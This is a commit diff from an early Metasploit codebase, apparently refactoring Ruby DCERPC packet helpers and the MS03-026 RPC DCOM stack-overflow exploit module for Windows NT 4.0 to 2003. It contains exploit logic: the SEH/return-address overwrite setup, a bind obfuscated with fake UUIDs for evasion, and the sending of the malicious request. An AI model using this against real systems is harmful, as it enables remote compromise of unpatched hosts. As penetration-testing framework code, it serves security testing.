git-svn-id: file:///home/svn/incoming/trunk@2852 4d416f70-5f16-0410-b530-b9f4589650daunstable
@ -9,17 +9,24 @@ module Msf
# This mixin provides utility methods for interacting with a DCERPC service on
# a remote machine. These methods may generally be useful in the context of
# exploitation. This mixin extends the Tcp exploit mixin.
# exploitation. This mixin extends the Tcp exploit mixin. Only one DCERPC
# service can be accessed at a time using this class.
module Exploit::Remote::DCERPC
include Exploit::Remote::Tcp
# Alias over the Rex DCERPC protocol modules
DCERPCPacket = Rex::Proto::DCERPC::Packet
DCERPCClient = Rex::Proto::DCERPC::Client
DCERPCResponse = Rex::Proto::DCERPC::Response
def initialize(info = {})
# OptInt.new('FragSize', [ 1, 'Set the DCERPC packet fragmentation size', 127])
# OptBool.new('MultiBind', [ 0, 'Configure multi-context bind calls', 'T' ])
OptInt.new('DCEFragSize', [ 1, 'Set the DCERPC packet fragmentation size', 127])
OptBool.new('DCEMultiBind', [ 0, 'Configure multi-context bind calls', 'T' ])
@ -27,19 +34,129 @@ module Exploit::Remote::DCERPC
], Msf::Exploit::Remote::DCERPC)
# Connect to the host/port specified by datastore['RHOST'], datastore['RPORT']
# Returns the context id on success and nil on failure
def connect_bind (uuid, vers)
# Generate a DCERPC bind request and send it on the default socket
def dcerpc_bind (uuid, vers = nil)
# 1. Create the socket and connect to the target system
# Create the bind request
bind, ctx = dcerpc_make_bind(uuid, vers)
if (bind == nil)
# 2. Call Rex::Proto::DCERPC::Client to generate the BIND packet(s)
# Verify that the socket exists
if (sock == nil)
# 3. Send the BIND packets and parse the response
# Send the bind request
# Parse the response
resp = DCERPCClient.read_response(sock)
if (resp.ack_result[ctx] != 0)
print_status("Failed to bind to UUID " + uuid)
return resp
# Generate DCERPC request packets and send them on the default socket
def dcerpc_call (func, stub)
# Create the request packets
pkts = dcerpc_make_call(func, stub)
if (pkts == nil)
# Verify that the socket exists
if (sock == nil)
print_status("Sending " + pkts.size.to_s + " DCERPC fragments...")
pkts.each { |chunk| sock.put(chunk) }
resp = DCERPCClient.read_response(sock)
return resp
# Generate the DCERPC bind request packet
def dcerpc_make_bind (uuid, vers = nil)
# Resolve the UUID if only the name was supplied
if (vers == nil)
vers = DCERPCUUID.vers_by_name(uuid)
uuid = DCERPCUUID.uuid_by_name(uuid)
# Verify that the uuid was resolved and is valid
if (uuid == nil)
print_status("Invalid UUID")
bind, ctx = nil, nil
if (datastore['DCEMultiBind'])
bind, ctx = DCERPCPacket.make_bind_fake_multi(uuid, vers, 10, 4)
bind, ctx = DCERPCPacket.make_bind(uuid, vers)
# Cache the context value for future requests
self.dcerpc_bind_context = ctx
return bind, ctx
# Generate the DCERPC request packets, broken up into DCEFragSize chunks
def dcerpc_make_call (func, stub, ctx = self.dcerpc_bind_context)
datastore['DCEFragSize'].to_i || stub.length,
# Used to track the last DCERPC context
attr_accessor :dcerpc_bind_context
# 4. Return the context id back to the calling function
u = Rex::Proto::DCERPC::UUID.new()
uuid = u.uuid_by_name('REMACT')
vers = u.vers_by_name('REMACT')
print_status("Attempting to bind to the RemoteActivator interface...")
bind_pkt, ctx = Rex::Proto::DCERPC::Packet.make_bind_fake_multi(uuid, vers, 10, 4)
resp = d.read_response(sock)
if (resp.ack_result[ctx] != 0)
print_status("DCERPC bind to the RemoteActivator interface failed")
print_status("Successful bind to the RemoteActivator interface")
print_status("Sending the malicious DCERPC request...")
Rex::Proto::DCERPC::Packet.make_request(0, stubdata, 256, ctx).each do |chunk|
@ -1,3 +1,4 @@
require 'rex/proto/dcerpc/uuid'
require 'rex/proto/dcerpc/response'
require 'rex/proto/dcerpc/client'
require 'rex/proto/dcerpc/packet'
@ -8,7 +8,7 @@ require 'rex/proto/dcerpc/response'
require 'rex/text'
# Process a DCERPC response packet from a socket
def read_response (socket)
def self.read_response (socket)
head = socket.timed_read(10, 5)
# rescue
@ -23,8 +23,11 @@ require 'rex/text'
return resp
body = socket.timed_read(resp.frag_len - 10, 10)
# rescue
rescue Timeout::Error
puts "Error: #{ $! }"
if (body.nil? or body.length() != resp.frag_len - 10)
return resp
@ -34,228 +37,6 @@ require 'rex/text'
return resp
# Create a standard DCERPC BIND request packet
def make_bind (uuid, vers)
u = Rex::Proto::DCERPC::UUID.new()
# Process the version strings ("1.0", 1.0, "1", 1)
bind_vers_maj, bind_vers_min = u.vers_to_nums(vers)
xfer_vers_maj, xfer_vers_min = u.vers_to_nums(u.xfer_syntax_vers)
# Create the bind request packet
buff =
5, # major version 5
0, # minor version 0
11, # bind type
3, # flags
0x10000000, # data representation
72, # frag length
0, # auth length
0, # call id
5840, # max xmit frag
5840, # max recv frag
0, # assoc group
1, # num ctx items
0, # context id
1, # num trans items
u.uuid_pack(uuid), # interface uuid
bind_vers_maj, # interface major version
bind_vers_min, # interface minor version
u.xfer_syntax_uuid, # transfer syntax
xfer_vers_maj, # syntax major version
xfer_vers_min, # syntax minor version
return buff, 0
# Create an obfuscated DCERPC BIND request packet
def make_bind_fake_multi(uuid, vers, bind_head=rand(6)+10, bind_tail=rand(4))
u = Rex::Proto::DCERPC::UUID.new()
# Process the version strings ("1.0", 1.0, "1", 1)
bind_vers_maj, bind_vers_min = u.vers_to_nums(vers)
xfer_vers_maj, xfer_vers_min = u.vers_to_nums(u.xfer_syntax_vers)
bind_total = bind_head + bind_tail + 1
bind_size = (bind_total * 44) + 28
real_ctx, ctx = 0, 0
# Create the header of the bind request
data =
5, # major version 5
0, # minor version 0
11, # bind type
3, # flags
0x10000000, # data representation
bind_size, # frag length
0, # auth length
0, # call id
5840, # max xmit frag
5840, # max recv frag
0, # assoc group
bind_total, # num ctx items
# Generate the fake UUIDs prior to the real one
1.upto(bind_head) do ||
# Generate some random UUID and versions
rand_uuid = Rex::Text.rand_text(16)
rand_imaj = rand(6)
rand_imin = rand(4)
data +=
ctx, # context id
1, # num trans items
rand_uuid, # interface uuid
rand_imaj, # interface major version
rand_imin, # interface minor version
u.xfer_syntax_uuid, # transfer syntax
xfer_vers_maj, # syntax major version
xfer_vers_min, # syntax minor version
ctx += 1
# Stuff the real UUID onto the end of the buffer
real_ctx = ctx;
data +=
ctx, # context id
1, # num trans items
u.uuid_pack(uuid), # interface uuid
bind_vers_maj, # interface major version
bind_vers_min, # interface minor version
u.xfer_syntax_uuid, # transfer syntax
xfer_vers_maj, # syntax major version
xfer_vers_min, # syntax minor version
ctx += 1
# Generate the fake UUIDs after the real one
1.upto(bind_tail) do ||
# Generate some random UUID and versions
rand_uuid = Rex::Text.rand_text(16)
rand_imaj = rand(6)
rand_imin = rand(4)
data +=
ctx, # context id
1, # num trans items
rand_uuid, # interface uuid
rand_imaj, # interface major version
rand_imin, # interface minor version
u.xfer_syntax_uuid, # transfer syntax
xfer_vers_maj, # syntax major version
xfer_vers_min, # syntax minor version
ctx += 1
# Return both the bind packet and the real context_id
return data, real_ctx
# Create a standard DCERPC ALTER_CONTEXT request packet
def make_alter_context (uuid, vers)
u = Rex::Proto::DCERPC::UUID.new()
# Process the version strings ("1.0", 1.0, "1", 1)
bind_vers_maj, bind_vers_min = u.vers_to_nums(vers)
xfer_vers_maj, xfer_vers_min = u.vers_to_nums(u.xfer_syntax_vers)
buff =
5, # major version 5
0, # minor version 0
14, # alter context
3, # flags
0x10000000, # data representation
72, # frag length
0, # auth length
0, # call id
5840, # max xmit frag
5840, # max recv frag
0, # assoc group
1, # num ctx items
0, # context id
1, # num trans items
u.uuid_pack(uuid), # interface uuid
bind_vers_maj, # interface major version
bind_vers_min, # interface minor version
u.xfer_syntax_uuid, # transfer syntax
xfer_vers_maj, # syntax major version
xfer_vers_min, # syntax minor version
# Used to create a piece of a DCERPC REQUEST packet
def make_request_chunk (flags=3, opnum=0, data="", ctx=0)
dlen = data.length
flen = dlen + 24
buff =
5, # major version 5
0, # minor version 0
0, # request type
flags, # flags
0x10000000, # data representation
flen, # frag length
0, # auth length
0, # call id
dlen, # alloc hint
ctx, # context id
opnum, # operation number
].pack('CCCCNvvVVvv') + data
# Used to create standard DCERPC REQUEST packet(s)
def make_request (opnum=0, data="", size=data.length, ctx=0)
dlen = data.length
chunks, frags = [], []
ptr = 0
# Break the request into fragments of 'size' bytes
while ptr < data.length
chunks.push( data[ ptr, size ] )
ptr += size
# Process requests with no stub data
if chunks.length == 0
frags.push( make_request_chunk(3, opnum, '', ctx) )
return frags
# Process requests with only one fragment
if chunks.length == 1
frags.push( make_request_chunk(3, opnum, chunks[0], ctx) )
return frags
# Create the first fragment of the request
frags.push( make_request_chunk(1, opnum, chunks.shift, ctx) )
# Create all of the middle fragments
while chunks.length != 1
frags.push( make_request_chunk(0, opnum, chunks.shift, ctx) )
# Create the last fragment of the request
frags.push( make_request_chunk(2, opnum, chunks.shift, ctx) )
return frags
@ -0,0 +1,235 @@
module Rex
module Proto
module DCERPC
class Packet
require 'rex/proto/dcerpc/uuid'
require 'rex/proto/dcerpc/response'
require 'rex/text'
# Create a standard DCERPC BIND request packet
def self.make_bind (uuid, vers)
u = Rex::Proto::DCERPC::UUID
# Process the version strings ("1.0", 1.0, "1", 1)
bind_vers_maj, bind_vers_min = u.vers_to_nums(vers)
xfer_vers_maj, xfer_vers_min = u.vers_to_nums(u.xfer_syntax_vers)
# Create the bind request packet
buff =
5, # major version 5
0, # minor version 0
11, # bind type
3, # flags
0x10000000, # data representation
72, # frag length
0, # auth length
0, # call id
5840, # max xmit frag
5840, # max recv frag
0, # assoc group
1, # num ctx items
0, # context id
1, # num trans items
u.uuid_pack(uuid), # interface uuid
bind_vers_maj, # interface major version
bind_vers_min, # interface minor version
u.xfer_syntax_uuid, # transfer syntax
xfer_vers_maj, # syntax major version
xfer_vers_min, # syntax minor version
return buff, 0
# Create an obfuscated DCERPC BIND request packet
def self.make_bind_fake_multi(uuid, vers, bind_head=rand(6)+10, bind_tail=rand(4))
u = Rex::Proto::DCERPC::UUID
# Process the version strings ("1.0", 1.0, "1", 1)
bind_vers_maj, bind_vers_min = u.vers_to_nums(vers)
xfer_vers_maj, xfer_vers_min = u.vers_to_nums(u.xfer_syntax_vers)
bind_total = bind_head + bind_tail + 1
bind_size = (bind_total * 44) + 28
real_ctx, ctx = 0, 0
# Create the header of the bind request
data =
5, # major version 5
0, # minor version 0
11, # bind type
3, # flags
0x10000000, # data representation
bind_size, # frag length
0, # auth length
0, # call id
5840, # max xmit frag
5840, # max recv frag
0, # assoc group
bind_total, # num ctx items
# Generate the fake UUIDs prior to the real one
1.upto(bind_head) do ||
# Generate some random UUID and versions
rand_uuid = Rex::Text.rand_text(16)
rand_imaj = rand(6)
rand_imin = rand(4)
data +=
ctx, # context id
1, # num trans items
rand_uuid, # interface uuid
rand_imaj, # interface major version
rand_imin, # interface minor version
u.xfer_syntax_uuid, # transfer syntax
xfer_vers_maj, # syntax major version
xfer_vers_min, # syntax minor version
ctx += 1
# Stuff the real UUID onto the end of the buffer
real_ctx = ctx;
data +=
ctx, # context id
1, # num trans items
u.uuid_pack(uuid), # interface uuid
bind_vers_maj, # interface major version
bind_vers_min, # interface minor version
u.xfer_syntax_uuid, # transfer syntax
xfer_vers_maj, # syntax major version
xfer_vers_min, # syntax minor version
ctx += 1
# Generate the fake UUIDs after the real one
1.upto(bind_tail) do ||
# Generate some random UUID and versions
rand_uuid = Rex::Text.rand_text(16)
rand_imaj = rand(6)
rand_imin = rand(4)
data +=
ctx, # context id
1, # num trans items
rand_uuid, # interface uuid
rand_imaj, # interface major version
rand_imin, # interface minor version
u.xfer_syntax_uuid, # transfer syntax
xfer_vers_maj, # syntax major version
xfer_vers_min, # syntax minor version
ctx += 1
# Return both the bind packet and the real context_id
return data, real_ctx
# Create a standard DCERPC ALTER_CONTEXT request packet
def self.make_alter_context (uuid, vers)
u = Rex::Proto::DCERPC::UUID
# Process the version strings ("1.0", 1.0, "1", 1)
bind_vers_maj, bind_vers_min = u.vers_to_nums(vers)
xfer_vers_maj, xfer_vers_min = u.vers_to_nums(u.xfer_syntax_vers)
buff =
5, # major version 5
0, # minor version 0
14, # alter context
3, # flags
0x10000000, # data representation
72, # frag length
0, # auth length
0, # call id
5840, # max xmit frag
5840, # max recv frag
0, # assoc group
1, # num ctx items
0, # context id
1, # num trans items
u.uuid_pack(uuid), # interface uuid
bind_vers_maj, # interface major version
bind_vers_min, # interface minor version
u.xfer_syntax_uuid, # transfer syntax
xfer_vers_maj, # syntax major version
xfer_vers_min, # syntax minor version
# Used to create a piece of a DCERPC REQUEST packet
def self.make_request_chunk (flags=3, opnum=0, data="", ctx=0)
dlen = data.length
flen = dlen + 24
buff =
5, # major version 5
0, # minor version 0
0, # request type
flags, # flags
0x10000000, # data representation
flen, # frag length
0, # auth length
0, # call id
dlen, # alloc hint
ctx, # context id
opnum, # operation number
].pack('CCCCNvvVVvv') + data
# Used to create standard DCERPC REQUEST packet(s)
def self.make_request (opnum=0, data="", size=data.length, ctx=0)
dlen = data.length
chunks, frags = [], []
ptr = 0
# Break the request into fragments of 'size' bytes
while ptr < data.length
chunks.push( data[ ptr, size ] )
ptr += size
# Process requests with no stub data
if chunks.length == 0
frags.push( make_request_chunk(3, opnum, '', ctx) )
return frags
# Process requests with only one fragment
if chunks.length == 1
frags.push( make_request_chunk(3, opnum, chunks[0], ctx) )
return frags
# Create the first fragment of the request
frags.push( make_request_chunk(1, opnum, chunks.shift, ctx) )
# Create all of the middle fragments
while chunks.length != 1
frags.push( make_request_chunk(0, opnum, chunks.shift, ctx) )
# Create the last fragment of the request
frags.push( make_request_chunk(2, opnum, chunks.shift, ctx) )
return frags
@ -27,7 +27,7 @@ class Response
self.raw = self.raw + body
self.type = self.raw[2,1].unpack('C')[0]
uuid = Rex::Proto::DCERPC::UUID.new()
uuid = Rex::Proto::DCERPC::UUID
data = self.raw
@ -3,8 +3,8 @@ module Proto
module DCERPC
class UUID
def initialize
@known_uuids =
@@known_uuids =
'MGMT' => [ 'afa8bd80-7d8a-11c9-bef4-08002b102989', '2.0' ],
'REMACT' => [ '4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0' ],
@ -15,10 +15,10 @@ class UUID
'EVENTLOG' => [ '82273fdc-e32a-18c3-3f78-827929dc23ea', '0.0' ],
'SVCCTL' => [ '367abb81-9844-35f1-ad32-98f038001003', '2.0' ]
# Convert a UUID in binary format to the string representation
def uuid_unpack(uuid_bin)
def self.uuid_unpack(uuid_bin)
uuid_bin[ 0, 4].unpack('V')[0],
uuid_bin[ 4, 2].unpack('v')[0],
@ -29,37 +29,37 @@ class UUID
# Convert a UUID in string format to the binary representation
def uuid_pack (uuid_str)
def self.uuid_pack (uuid_str)
parts = uuid_str.split('-')
[ parts[0].hex, parts[1].hex, parts[2].hex, parts[3].hex ].pack('Vvvn') + [ parts[4] ].pack('H*')
# Provide the common TransferSyntax UUID in packed format
def xfer_syntax_uuid ()
def self.xfer_syntax_uuid ()
# Provide the common TransferSyntax version number
def xfer_syntax_vers ()
def self.xfer_syntax_vers ()
# Determine the UUID string for the DCERPC service with this name
def uuid_by_name (name)
if @known_uuids.key?(name)
def self.uuid_by_name (name)
if @@known_uuids.key?(name)
# Determine the common version number for the DCERPC service with this name
def vers_by_name (name)
if @known_uuids.key?(name)
def self.vers_by_name (name)
if @@known_uuids.key?(name)
# Convert a string or number in float format to two unique numbers 2.0 => [2, 0]
def vers_to_nums (vers)
def self.vers_to_nums (vers)
vers_maj = vers.to_i
vers_min = ((vers.to_f - vers.to_i) * 10).to_i
return vers_maj, vers_min
@ -12,11 +12,12 @@ class Exploits::Windows::MSRPC_DCOM_MS03_026 < Msf::Exploit::Remote
def initialize(info = {})
'Name' => 'Microsoft RPC DCOM MSO3-026',
'Description' =>
"This module exploits a stack overflow in the RPCSS service, this vulnerability" +
"was originally found by the Last Stage of Delirium research group and has been" +
"widely exploited ever since. This module can exploit the English versions of " +
"Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)",
'Description' => %q{
This module exploits a stack overflow in the RPCSS service, this vulnerability
was originally found by the Last Stage of Delirium research group and has bee
widely exploited ever since. This module can exploit the English versions of
Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)
'Author' => [ 'hdm', 'spoonm' ],
'Version' => '$Revision$',
'References' =>
@ -59,9 +60,11 @@ class Exploits::Windows::MSRPC_DCOM_MS03_026 < Msf::Exploit::Remote
def exploit
print_status("Connecting to the target system...")
# Create the gigantic stub used to exploit 7 targets at the same time
print_status("Building the malicious DCERPC request...")
# Carefully create the combination of addresses and code for cross-os exploitation
@ -88,7 +91,6 @@ class Exploits::Windows::MSRPC_DCOM_MS03_026 < Msf::Exploit::Remote
xpseh[ 310, 4 ] = [ target['Rets'][3] ].pack('V')
xpseh[ 314, jmpsc.length ] = jmpsc
# NT 4.0 SP3/SP4 work the same, just use a pop/pop/ret that works on both
# NT 4.0 SP5 is a jmp eax to avoid a conflict with SP3/SP4
@ -152,38 +154,30 @@ class Exploits::Windows::MSRPC_DCOM_MS03_026 < Msf::Exploit::Remote
"\xc0\x00\x00\x00\x00\x00\x00\x46\x01\x00\x00\x00\x01\x00\x00\x00" +
# Pad, calculate, set number of wide chars in path
pathsz = (((uncpath.length + 11) & ~7) / 2)
stubdata[ 52, 4 ] = [ pathsz ].pack('V')
stubdata[ 60, 4 ] = [ pathsz ].pack('V')
d = Rex::Proto::DCERPC::Client.new()
u = Rex::Proto::DCERPC::UUID.new()
uuid = u.uuid_by_name('REMACT')
vers = u.vers_by_name('REMACT')
print_status("Attempting to bind to the RemoteActivator interface...")
bind_pkt, ctx = d.make_bind_fake_multi(uuid, vers, 10, 4)
resp = d.read_response(sock)
if (resp.ack_result[ctx] != 0)
print_status("DCERPC bind to the RemoteActivator interface failed")
print_status("Successful bind to the RemoteActivator interface")
print_status("Sending the malicious DCERPC request...")
d.make_request(0, stubdata, 256, ctx).each do |chunk|
# Connect to the remote MSRPC service
print_status("Connecting to the target system...")
# Bind to the UUID and call the vulnerable function
res = self.dcerpc_bind('REMACT')
return if res == nil
self.dcerpc_call(0, stubdata)
# Perform any required client-side payload handling
Reference in New Issue